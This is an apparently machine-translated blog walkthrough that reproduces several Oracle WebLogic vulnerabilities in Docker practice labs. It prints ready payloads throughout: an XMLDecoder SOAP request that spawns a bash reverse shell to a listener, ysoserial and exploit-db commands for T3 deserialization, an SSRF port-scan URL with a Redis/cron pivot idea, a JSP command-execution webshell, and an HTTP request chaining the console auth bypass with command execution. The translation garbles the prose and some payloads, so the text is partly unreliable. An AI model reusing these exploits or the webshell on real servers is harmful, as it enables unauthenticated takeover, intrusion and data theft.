Zero introduction:

WebLogic is an application Server produced by Oracle Corporation in the United States. To be precise, it is a middleware developed based on JAVAEE. Similar to Tomcat, WebLogic is used for developing, integrating, deploying and managing large distributed Web applications. Java application server for web applications and databases. Bring Java dynamic capabilities and Java Enterprise standard security to the development, integration, deployment, and management of large-scale web applications.

In fact, WebLogic is the same as Tomcat, which is used to deploy Java Web programs as a server. It is used to connect clients and servers and even deploy management databases to manage them. This is also the difference between WebLogic and Tomcat. WebLogic can be used to deploy large projects, because WebLogic includes EJB, JSP, servlet, JMS container, it can achieve higher and more functions, but Tomcat is the official designated JSP $servlet server, only JSP /servlet related specifications, EJB is not supported, but Tomcat is a handy container for learning or building small Java Web projects.

With its outstanding clustering technology, WebLogic Server handles the performance, scalability and high availability required for critical Web application system problems.

Network clustering, as well as EJB component clustering, does not require any specialized hardware or operating system support to achieve transparent replication, load balancing, and presentation content tolerance. But both web clustering and component clustering are critical to the scalability and availability required for e-business solutions. Shared client/server and database connections, as well as data caching and EJBs, enhance performance that other Web applications do not, so WebLogic is far more scalable than Tomcat.

1, electronic books (white hat) 2, security factory internal video 3, 100 SRC documents 4, common security comprehensive questions 5, CTF contest classic topic analysis 6, the full kit 7, emergency response notes 8, network security learning route

Cve-2017-10271 Vulnerability reoccurrence

1). Official documents

Find the official description on the CVE website:

Vulnerability in Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). The supported versions affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, and 12.2.1.2.0. The easy-to-exploit vulnerability allows an unauthenticated attacker to access the network through T3 and compromise Oracle WebLogic Server. A successful attack on this vulnerability can result in a takeover of Oracle WebLogic Server. CVSS 3.0 Base score 7.5 (Usability impact). CVSS Vector: (CVSS: 3.0/AV: N/AC: L/PR: N/UI: N/S: U/C: N/I: N/A: H)

2). Problem type

The easy-to-exploit vulnerability allows an unauthenticated attacker to compromise Oracle WebLogic Server with network access over HTTP. A successful attack on this vulnerability can result in a takeover of Oracle WebLogic Server.

3). Affect the version

Weblogic Server

  • =10.3.6.0.0: Impact 10.3.6.0.0

  • =12.1.3.0.0: Impact 12.1.3.0.0

  • =12.2.1.1.0: Impact 12.2.1.1.0

  • =12.2.1.2.0: Impact 12.2.1.2.0

4). Vulnerability Description:

A Security vulnerability in the WLS Security sub-component of Oracle Weblogic Server component in Oracle Fusion Middleware, where the use of carefully constructed XML data can cause arbitrary code execution, requiring an attacker to send constructed HTTP requests, You get access to the target server. An attacker can exploit the vulnerability to control components, image data availability, confidentiality, and completeness.

Different from CVE-2018-2628, cVE-2018-2628 uses T3 protocol to insert deserialized malicious code in the middle of it, making it execute direct calls to malicious classes. Therefore, the principle of the two vulnerabilities is actually deserialization, resulting in the direct call of the object, but the utilization principle is different.

In fact, CVE-2017-10271 predecessor is CVE-2017-3506, in the early Oracle official released for CVE-2017-3506 patch, but in fact only uses the blacklist fix, so after careful construction, or can capture the corresponding HTTP request structure for use.

After personal reanalysis, I found that the core idea is that Weblogic Sercurity component provides WebService service, which uses XMLdecoder to parse XML data transmitted by users, so deserialization vulnerability occurs in the process of parsing, resulting in executable commands.

When we access wLs-wsat /WorkContextServer, we find that it can be accessed, which indicates that there is this vulnerability. However, I have read many articles, but there is no explanation about why, or what the directory file is. Wls-wast. war: wLs-wSAT: wLs-wSAT: WLSServletAdapter The WorkContextServerTube class is then handed over to process the XML data in the packet submitted by POST.

Without further explanation, we begin to repeat:

5). Reproduction process

To build the environment, first use Docker to build vulhub shooting range, enter the corresponding directory, and build the environment

successful

After that, we first checked the readme. MD file provided by Vulhub to check the reproduction process, and found that, in fact, it was the same as our analysis to capture packets and modify HTTP packets for malicious class implementation

So we started to reproduce

First verify whether the vulnerability exists

  • 1. Verify using tools

Use the vulnerability special detection tool provided by Anheng Information for you to detect:

Detection Succeeded

Loopholes do exist

  • 2. Perform verification directly

When we take the good environment and found can visit http://127.0.0.1:7001/wls-wsat/CoordinatorPortType kindly tell the vulnerability exists, because the above said, is not here

Use Win10 host access, packet capture modify HTTP packets

ok

Rebound in the shell

Before we modify the packet and insert the POC, we first monitor the target port

Then modify the POC to send

Rebound shellpoc

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext XMLNS: work = "http://bea.com/2004/06/soap/workarea/" > < Java version = "1.4.0" class = "Java. Beans. XMLDecoder" > < void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& / dev/TCP / 192.168.0.134/4444 0 > &1 < / string > < / void > < / array > < void method = "start" / > < / void > Java < / a > < / work: WorkContext > </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>Copy the code

Modifying a packet

As shown, the request type is POST before the POC can be added below

Then change the content-type to text/ XML. Directly changing the file type may cause XML parsing errors

Then change the IP in the POC to the listening address

Successfully rebound shell

Note that I only used one virtual machine to reproduce this vulnerability

File upload

Capture and modify packets to realize file upload vulnerability

File upload POC

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext XMLNS: work = "http://bea.com/2004/06/soap/workarea/" > < Java version = "1.6.0" class = "Java. Beans. XMLDecoder" > < object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println"> <string>monster_test</string></void><void method="close"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>Copy the code

Release the package, then access the upload interface

Cve-2018-2628 Vulnerability reoccurrence

1). Official documents

Find the official description on CVE’s website:

Vulnerability in Oracle WebLogic Server component (subcomponent: WLS Core Components) of Oracle Fusion Middleware. Affected supported versions are 10.3.6.0, 12.1.3.0, 12.2.1.2, and 12.2.1.3. The easy-to-exploit vulnerability allows an unauthenticated attacker to access the network through T3 and compromise Oracle WebLogic Server. A successful attack on this vulnerability can result in a takeover of Oracle WebLogic Server. CVSS 3.0 Base score 9.8 (Confidentiality, integrity and availability impact). CVSS Vector: (CVSS: 3.0/AV: N/AC: L/PR: N/UI: N/S: U/C: H/I: H/A: H)

2). Problem type

The easy-to-exploit vulnerability allows an unauthenticated attacker to access the network through T3 and compromise Oracle WebLogic Server. A successful attack on this vulnerability can result in a takeover of Oracle WebLogic Server.

3). Affect the version

Weblogic Server

  • =10.3.6.0: Impact 10.3.6.0

  • =12.1.3.0: Impact 12.1.3.0

  • =12.2.1.2: Impact 12.2.1.2

  • =12.2.1.3: Impact 12.2.1.3

Use JDK 1.7 or higher to reproduce

4)

It is necessary to know some terms and protocols before reproducing vulnerabilities

JAVA Remote Method Invocation (RMI)

In programming languages, is an application program interface for implementing remote procedure calls. It enables programs running on the client to invoke objects on the remote server. This approach enables programmers to perform distributed operations in a network environment. The whole purpose of RMI is to make it as easy as possible to use remote invocation interface objects. Java RMI relies heavily on interfaces. When a remote object needs to be created, the programmer can hide the underlying implementation details by passing an interface. The remote object that the client gets happens to connect to the local root code, which is responsible for communicating over the network.

Rmi can call remote methods directly across the JVM (Java Virtual Machine), but rmI is the opposite of Java method invocation, which normally refers to invoking a method within a JVM.

The rmI invocation is similar. The HTTP invocation is based on a Java method, but rmI invocation is based on a Java method. There are a number of definitions for RMI in Java.

Simple: RMI is a call to a Java remote method

2. Java Remote Method Protocol (JRMP)

JRMP is a line layer protocol based on TCP/IP. The process of RMI is to use JRMP protocol to organize data format and then transmit data through TCP protocol, so as to achieve the realization of RMI method and remote method call.

With rmi is introduced, we use a browser to access a network interface, data transfer between the browser and server as well as the data format between organization, is to use the Http protocol based on the TCP/IP, only based on Http protocol, the browser and server to the appointment, normal communication communication, JRMP is also based on this principle, But JRMP is only used in Java RMI.

JRMP is a protocol for RMI (Java Remote Method Invocation). Only based on this protocol can data be exchanged between calling parties.

Critically, the JRMP protocol must be Java language dependent for both rmI calls, that is, both client and server must use Java. JRMP is a stream-based protocol that can only be java-to-Java calls of an object.

Refer to the RMI call step diagram above to understand.

3. T3 protocol:

As mentioned earlier, JRMP is only used for Java-to-Java calls to a single object, while T3 protocol is used to transfer information between Weblogic servers and other types of Java programs. Weblogic keeps track of every JVM connected to an application, transferring traffic to the JVM, and Weblogic creates a T3 connection that maximizes efficiency by eliminating multiple protocols between networks, thereby using fewer operating system resources. The protocol used for T3 connections also minimizes packet size and improves transmission speed.

Subjects of T3 agreement include:

1. Request header 2. Request body

Request header similar to:

T3 12.2.1 AS:255 HL:19 MS:10000000 PU:t3://localhost:7001 LP:DOMAIN 1Copy the code

Ended up with \ n

At the same time, we send a request packet from T3, which can be used to spy on the webLogic version of the server, and the server will respond with its own version, as shown in figure 3

HELO:12.1.3.0 false AS:2048 HHL :19 MS:10000000Copy the code

In this vulnerability, the principle is also to replace part of the T3 protocol with malicious serialized data for malicious operations

4. Ysoserial:

Most of the analysis on the principle of Java deserialization vulnerability is based on the third-party library Apache Commons Collections, and the CC chain we analyze and learn is also based on this library. Ysoserial, on the other hand, is a proof-of-concept tool for generating payloads that deserialize insecure Java objects. Provides more possibilities for Java deserialization.

Ysoserial utilizes Java reflection and dynamic proxy mechanisms to generate POCs.

There’s a lot of payload to learn about.

At that time, there may be an error when importing maven package. Baidu can find a general solution for normal problems.

5). Reproduction process

First we turn on the virtual machine

Start vulhub/ Weblogic /CVE-2018-2628 environment

Use Docker PS to view uid and boot port

At this point to http://127.0.0.1:7001/console/ you can access to the weblogic

Now that the environment has been set up, let’s see how reproduction works

Since Docker can only communicate with the layout host (virtual machine) by direct command, we directly use the virtual machine as the attack plane and docker as the target plane for reproduction

View the IP of the Docker container

The IP address of the attack plane is 192.168.0.134

Drone IP: 172.24.0.2

The environment is established and the IP is known. At this time, we set up the JRMP service between the two servers. Start a JRMP Server in the attack plane and use ySOSerial to set up

Wget HTTP: / / https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jarCopy the code

If the load is successful, there may be an error, connection error or access denial at first. Just try a few times.

View file Location

There are! Note that I created it in the WebLogic folder. It is recommended that you create a folder on your desktop for download and storage.

At this point we use ySOSerial to listen on port 7001 in WebLogic

Java - cp ysoserial - 0.0.6 - the SNAPSHOT - BETA - all. Jar ysoserial. Exploits. JRMPListener 1099 (listener port) CommonsCollections1 'touch / TMP/run the command 'Copy the code

To start listening to

We then went to the exploit class download website https://www.exploit-db.com/exploits/44553 to download the exploit script

You can drag the VM or download it directly

Direct download command:

The python file downloaded from wget https://www.exploit-db.com/download/44553 has no format, so we need to manually change it to run mv 44553 44553.pyCopy the code

The script is then called to execute the previous exp

Python 44553.py 172.24.0.27001 (weblogic address and port) ysoserial-0.0.6- snapshot-beta-all. jar(ysoserial directory, 192.168.100.34 1099(local address and port) JRMPClientCopy the code
Py 172.24.0.2 7001 ysoserial-0.0.6- snapshot-beta-all. jar 192.168.100.34 1099 JRMPClientCopy the code

Execution successful! The port information is displayed:

Check whether there is more lidalu.txt in the docker directory

We found that the command was executed successfully, now we can verify that the replication is successful!

Cve-2014-4210 SSRF vulnerability reoccurrence

1). Official documents

An unspecified vulnerability exists in Oracle WebLogic Server components in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0, Enables remote attackers to affect confidentiality through WLs-related carriers (Web Services).

2). Affect the version

weblogic

10.0.2-10.3.6.0

3). Vulnerability description

In weblogic 10.0.2-10.3.6.0 version, loopholes in http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp, We can use the returned error information to observe and detect the status of open ports by constructing requests, and even use the SSRF to construct arbitrary HTTP requests to attack Intranet components such as Redis or FastCGI.

4). SSRF

*** SSRF (Server-side Request Forgery)*** is a security vulnerability created by an attacker to create a server request.

Normally, generally only for external network firewall protection, but not too many measures for internal network, so we directly disguised as internal machine sends a request to the Intranet machine will determine such a request is safe and reliable, so we want to execute the command should be executed, will bypass the restrictions, firewall and network to realize the horizontal permeability, This is how SSRF is generally implemented:

Such as:

Assume that a company’s network provides a web server named public.example.com to the outside world. This web server uses a backend /proxy to redirect web links to specified parameters in the URL, for example

public.example.com/proxy?url=google.com The page is redirected to The Google page. The domain name of the company’s background management page is admin.example.com. This link can be accessed only from internal networks, but not from external networks. So what happens if we construct public.example.com/proxy?url=admin.example.com for access, the Intranet will determine that the request was made by a machine inside the company, and it will jump directly to the corresponding interface, This is why there is no security between external services and internal machines, resulting in the IMPLEMENTATION of SSRF

SSRF implementation:

SSRF usually occurs when a server requests an external resource, for example, a server application may request an external image to create a thumbnail

Or dynamic resource images of video files while browsing comments, so if the server does not take internal resource processing for images or GIFs at this time, we can use it to implement SSRF

Further access to information systems on the internal network

If a site supports capturing user avatars in the form of urls, and has no further security measures for internal resources or urls, we can implement malicious features through SSRF

SSRF attack forms:

1. You can add different IP addresses after the target URL to learn about the server or Intranet information based on the command output

2. You can add different ports after the IP address to identify services or ports based on the command output to scan Intranet ports

3. Worst of all, SSRF can get some information by constructing some dangerous url, such as administrator password, and then upload webshell, and you get the idea

Or for some weak sites or insecure management interface to start with, using its weaknesses to construct scripts, to achieve remote code execution

As for the specific implementation, we understand it, do not do illegal things

With that said, here we go:

5). Reproduction process:

When redies was accessed by docker, an error occurred, that is, the drag and pull environment failed, so we manually set up the Weblogic environment on the machine to reproduce this vulnerability:

First download the WebLogic environment, go to the official website to download:

www.oracle.com/technetwork…

Download and install, the following installation tutorial:

https://blog.csdn.net/hdqhdq123/article/details/41745889

Since the above web disk provides 10.3.6.0, I specifically found a corresponding version of the tutorial

After the installation is successful, open it

The CMD file in the corresponding directory automatically starts the WebLogic service

If the following information is displayed, the startup is successful

Visit http://youip:7001 to visit WebLogic, and then go to the directory where the vulnerability resides:

http://192.168.0.1:7001/uddiexplorer

The loophole exists

At this point we construct the malicious URL: add after the URL

? rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://y ouip:7001Copy the code

This contract

If the following command output is displayed, the IP address exists and the port is open

The internal network information is leaked here, so I’m setting up locally, so display localhost. If we meet in reality, we won’t display localhost

We access the Redis service

Display not open

The SSRF detection output has the following meanings:

  • For services whose requests are not open:

    • weblogic . uddi. client. structures. exception.XML_ SoapException: Triedall:’1′ addresses, but could not connect over HT TP to server:’fuzz.wuyun.com’, port: ’88’

  • For services whose requests may be identified:

    • weblogic.uddi. client structures. exception.XML SoapException:Received a response from url: http :/www.baidu.com/ which did not have a valid SOAP content-type: text/html; charset=UTF-8.

  • This is the url we mentioned before that can jump to

  • For services that request openness:

    • weblogic . uddi. client. structures.exception.XML SoapException:Received a response from url: http://fuzz .wuyun .com:22 /helo which did not have a valid SOAP content-type: null.

  • For unrecognized services:

    • weblogic.uddi. client. structures .exception.XML_ SoapException:Received a response from url: http://fuzz .wuyun.com:22 which didnot have a valid SOAP content-type: null.

At this time, we accessed port 6389 and did not open the Redis service, because I did not build the database and other Intranet services

When we encounter a machine with open Redis service, that is, 6389 shows the open machine, we use this machine as a springboard to send shell shell script to /etc/cronrab file to the machine with open Redis service, and then start monitoring and bounce shell

4. Cve-2018-2894 vulnerability reoccurrence

1). Official documents

Vulnerability in Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS – Web Services). The supported versions affected are 12.1.3.0, 12.2.1.2, and 12.2.1.3. The easy-to-exploit vulnerability allows an unauthenticated attacker to compromise Oracle WebLogic Server with network access over HTTP. A successful attack on this vulnerability can result in a takeover of Oracle WebLogic Server. CVSS 3.0 Base score 9.8 (Confidentiality, integrity and availability impact). CVSS Vector: (CVSS: 3.0/AV: N/AC: L/PR: N/UI: N/S: U/C: H/I: H/A: H)

2). Affect the version

​ Weblogic Server

  • 12.1.3.0

  • 12.2.1.2

  • 12.2.1.3

I have seen many articles on the Internet about WebLogic including version 10.3.6.0, but I did not find the option of Enable Web Service Test Page in the advanced Settings of domain management after checking the environment. If you know, please let me know.

3). Vulnerability description

On several versions of Weblogic Server, we can upload any file by enabling the Web Service Test Page, but this hole is rarely used because in production mode, The Web services test page is closed by default, so we can’t actually access WebLogic from the Internet, so the scope is limited.

After opening the Web services test page option, we set the test page address to a public address, and then any file can be uploaded on this page where uploaded files are displayed.

4). Vulnerability recurrence

I used Docker + Vulhub to reproduce

First deploy the environment

See the readme.me file for ideas

Through the docker – compose logs | grep password command to get weblogic background login user name password (win the brother of built environment at the time of installation will display Settings account password, mentioned before, we do not explain)

Enter to log in

After successfully logging in, find additional options in domain Administration

Check the server test page option (I said 10.3.6.0 does not have this option)

After setting up, we set up the test page

Go to http://172.17.0.1:7001/ws_utc/config.do

Or visit http://172.17.0.1:7001/ws_utc/begin.do

Access config.do to change the work home dir to a static address

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testcli ent-app-wls/4mcj4y/war/cssCopy the code

Because this address is accessible to the Internet, our automatic deployment of web services at this address, the Internet can access the directory without permission, the Internet through http://your-ip:7001/ws_utc/css/ file name to access the file under this address, so at this time we can realize any file upload

Add the file in Security

Upload webshell

<% if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))! =-1){ out.println(new String(b)); } out.print("</pre>"); } % >Copy the code

Uploaded successfully

Open the web console, find the corresponding foreground code, find the timestamp

After the access to upload files, http://192.168.0.134:7001/ws_utc/css/config/keystore/ [timestamp] _ [file name] execution webshell (note that at this point is the address of your virtual machine access, can’t is 127, otherwise it will show 404)

View the file directory successfully

Read an article on the net, a master wrote a big horse, we use it

Execute JSP dama

The chopper!

It’s connected!

The limitation of this hole is that the version control is severe and the test page is usually not open to the public, so it is very difficult to upload files

5. CVE – 2020-14882

1). Official documents

Vulnerability (component: console) in Oracle WebLogic Server product of Oracle Fusion Middleware. Affected supported versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0. The easy-to-exploit vulnerability allows an unauthenticated attacker to compromise Oracle WebLogic Server with network access over HTTP. A successful attack on this vulnerability can result in a takeover of Oracle WebLogic Server. CVSS 3.1 Base score 9.8 (Confidentiality, integrity and availability impact). CVSS Vector: (CVSS: 3.1/AV: N/AC: L/PR: N/UI: N/S: U/C: H/I: H/A: H)

2). Problem description

The easy-to-exploit vulnerability allows an unauthenticated attacker to compromise Oracle WebLogic Server with network access over HTTP. A successful attack on this vulnerability can result in a takeover of Oracle WebLogic Server.

3). Affect the version

​ WebLogic Server

  • =10.3.6.0.0: Impact 10.3.6.0.0

  • =12.1.3.0.0: Impact 12.1.3.0.0

  • =12.2.1.3.0: Impact 12.2.1.3.0

  • =12.2.1.4.0: Impact 12.2.1.4.0

  • =14.1.1.0.0: affects 14.1.1.0.0

4). Vulnerability description

In the October 2020 WebLogic server update, officials fixed two security vulnerabilities, cVE-2020-14882 and CVE-2020-14883, which were submitted by Changting Security researcher @voidFyoo

14882 vulnerability allows unauthorized users to bypass the permission verification of the management console to access the background, 14883 vulnerability allows any user in the background to execute any command through HTTP protocol, and the exploit chain formed by using two vulnerabilities can execute commands by any unauthorized user on a remote WebLogic server through a GET request.

——————–vulhub File description

The vulnerability is unauthorized access to a console component. Cve-2020-14882 executes code on the console without authorization, allowing an attacker to construct a special HTTP request to take over the WebLogic Server Console without authentication. And execute arbitrary code that triggers the console component, which corresponds to the WebApp, thus forming this vulnerability.

We won’t repeat it here

5). Vulnerability recurrence

Docker + Vulhub was used to build the environment

See the readme.me file for the steps and principles of reproduction

Visit http://192.168.0.134:7001/console to enter the login interface

After we visit build url directly to bypass the access to the backend interface http://192.168.0.134:7001/console/css/%252e%252e%252fconsole.portal%252e%252e%252f is secondary encoded.. /, use this escape to achieve unauthorized access to the background through the path

However, at this time, we saw that there were many things less than when we logged in with the account and password before. Because unauthorized login made us lack of permissions and functions such as deployment and execution, we used 14883 to carry out combined attacks

First we use the Exploit class to execute some commands

Download exploits

Execute successfully

Let’s try to execute the command

caught

Modify the packet, construct the execution command to open the computer

Put the package

successful

Implementing file writing

It’s the same idea

caught

Modify data packets to write files

POST /console/images/%252E%252E% 252fconsole. portal HTTP/1.1 Host: 192.168.0.134:7001 cache-control: Max-age =0 upgrade-insecure -Requests: 1 User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; The rv: 43.0) Gecko / 20100101 Firefox 43.0 / Accept: text/HTML, application/XHTML + XML, application/XML. Q = 0.9, image/avif, image/webp image/apng, * / *; Q = 0.8, application/signed - exchange; v=b3; Q =0.9 Accept-encoding: gzip, deflate Accept-language: zh-cn,zh; Q =0.9 Connection: close Content-type: application/x-www-form-urlencoded content-Length: 138 _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%2 0/tmp/123.txt');" )Copy the code

Write successfully!

So much for replicating WebLogic.